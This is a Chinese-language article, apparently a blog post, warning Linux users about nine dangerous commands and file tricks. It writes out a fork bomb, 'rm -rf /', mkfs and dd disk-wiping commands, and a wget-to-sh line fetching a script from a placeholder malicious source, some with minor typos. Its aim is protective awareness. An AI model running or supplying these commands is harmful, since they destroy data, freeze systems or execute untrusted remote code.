還有一些事情需要注意:一些命令只在Ubuntu中有sudo首碼時是有危害的。其他發行版本的Linux,則是在作為根目錄命令時會有危害。
1、Linux Fork Bomb Command
: (){ :: & };:以Fork Bomb聞名,是一個拒絕服務的攻擊的Linux系統。: (){ :: & };:是一個bash函數。只要被執行,他會不斷重複,直到系統被凍結。
你只能重啟系統解決這個問題。所以當你在Linux介面執行這個命令時一定要注意。
2、Mv Folder/Dev/Null Command
mv folder/dev/null也是一個危險的命令。Dev/null或者null device是一個刪除所有寫在這個裝置檔案上資料的裝置檔案,但是,該操作提示卻是寫入操作執行成功。這就是我們常說的bit bucked或者black hole。
3、Rm -Rf Command
rm -rf命令在Linux系統中可以快速刪除檔案夾及其內容。如果,你不知道如何正確使用它,你就只有哭了。
以下為m-rf命令最常見的組合和選擇:
rm command:刪除Linux系統的檔案
rm -f command:不需提示,刪除檔案中的唯讀檔案
rm -r command:迴圈刪除檔案夾的內容
rm -d command:刪除空目錄,如果非空目錄則不會執行該操作
rm -rf/ command:強制移除根目錄中的所有內容和子檔案夾(包括防寫保護檔案)命令
rm -rf* command:強制移除目前的目錄中的所有內容(當前工作目錄)和字檔案夾
rm -rf. command:強制移除當前檔案夾目錄/子目錄中的所有內容。同rm -r.[^.]*
The rm -r.[^.]* command:刪除檔案及檔案夾,帶有刪除提示
4、Mkfs Command
如果你不知mkfs的作用,那麼它也是一個危險的命令,mkfs之後寫的任何命令都將會被一個空白的linux檔案系統格式化、替代。
下面列舉出需要管理員權限,格式化硬碟的命令:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos mkfs.reiserfs
mkfs.vfat
mkfs.cramfs也可以和上面的代碼做同樣的事情,不過不需要管理源許可權。
5、Tar Bomb
tar命令用於將多個檔案以.tar格式放入一個檔案中(封存檔案)。Tape Archive (Tar) bomb可以由他建立。
當為壓縮時,就是這個封存檔案產生數以萬計的相似名稱檔案出現在目前的目錄中而不是新目錄。
當收到tar檔案,定期建立一個新的保護目錄,然後在解壓前將接受的tar檔案放到這個目錄中,你可以避免成為tar bomb的受害者。
6、Dd Command
Dd命令用於複製&改變硬碟分區。如果,你用錯地方了,那麼也很危險。
下面列舉dd命令:
dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if=something of=/dev/sda
下面這個命令會將整個主硬碟清零:dd if=/dev/zero of=/dev/had
7、Shell Script Code
有時候,你可能會被人坑,給你一個shell指令檔,讓你去下載並執行它。該指令碼可能會包含一些惡意的或危險的代碼。命令形式可能會是這樣:wget http://some_malicious_source -O- sh。wget將會在sh狹隘指令碼時下載指令碼。
8、Malicious Source Code
也許有人會給你原始碼讓你編譯他。代碼可能是正常代碼,不過,有一些惡意代碼偽裝在大型原始碼中,如果是這樣,你的系統就中槍了。如何避免?僅接受並編譯可信賴來源的原始碼。
9、Decompression Bomb
你已經收到一個壓縮檔,你被要求提取這個看起來很小的檔案,可能小到KB。事實上,該小尺寸的壓縮檔包含高度壓縮資料。
只要檔案解壓,上百GB資料會被提取,這時候,過大的資料填滿硬碟導致宕機,幾率就很大了。如何避免?還是那句老話,別手賤,什麼檔案都去接收,請接收可信任來源檔案。